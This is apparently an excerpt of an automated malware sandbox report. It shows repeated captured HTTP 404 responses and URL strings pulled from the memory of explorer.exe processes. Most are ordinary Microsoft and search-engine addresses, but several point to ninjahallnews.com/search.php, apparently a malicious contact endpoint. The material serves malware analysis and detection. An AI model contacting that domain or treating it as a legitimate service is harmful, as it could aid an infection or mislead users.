    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:15:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:16:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:16:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:16:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:16:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:17:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:17:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:17:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:17:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714214709.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714214709.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714214709.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714214709.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
    Source: explorer.exe, 00000001.00000000.1714950006.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1713787801.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1713291422.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
    Source: explorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000001.00000000.1714214709.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000001.00000000.1714214709.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
    Source: explorer.exe, 00000001.00000000.1711147708.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1711733721.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000001.00000000.1714214709.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
    Source: explorer.exe, 00000001.00000000.1714214709.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000001.00000000.1714214709.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2750919806.0000000002DDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002DC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/application/x-www-form-urlencodedMozilla/5.0
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/earch.php
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002DC4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2750919806.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2708231092.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4124446936.0000000002847000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4124446551.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4124735208.0000000003287000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.4124374617.0000000000588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.php
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.php(
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2708231092.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4124446936.0000000002847000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4124446551.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4124735208.0000000003287000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.4124374617.0000000000588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.phpMozilla/5.0
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.phpb
    Source: explorer.exe, 0000000D.00000002.2750919806.0000000002D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com:443/search.phpge
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
    Source: explorer.exe, 00000001.00000000.1716416454.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
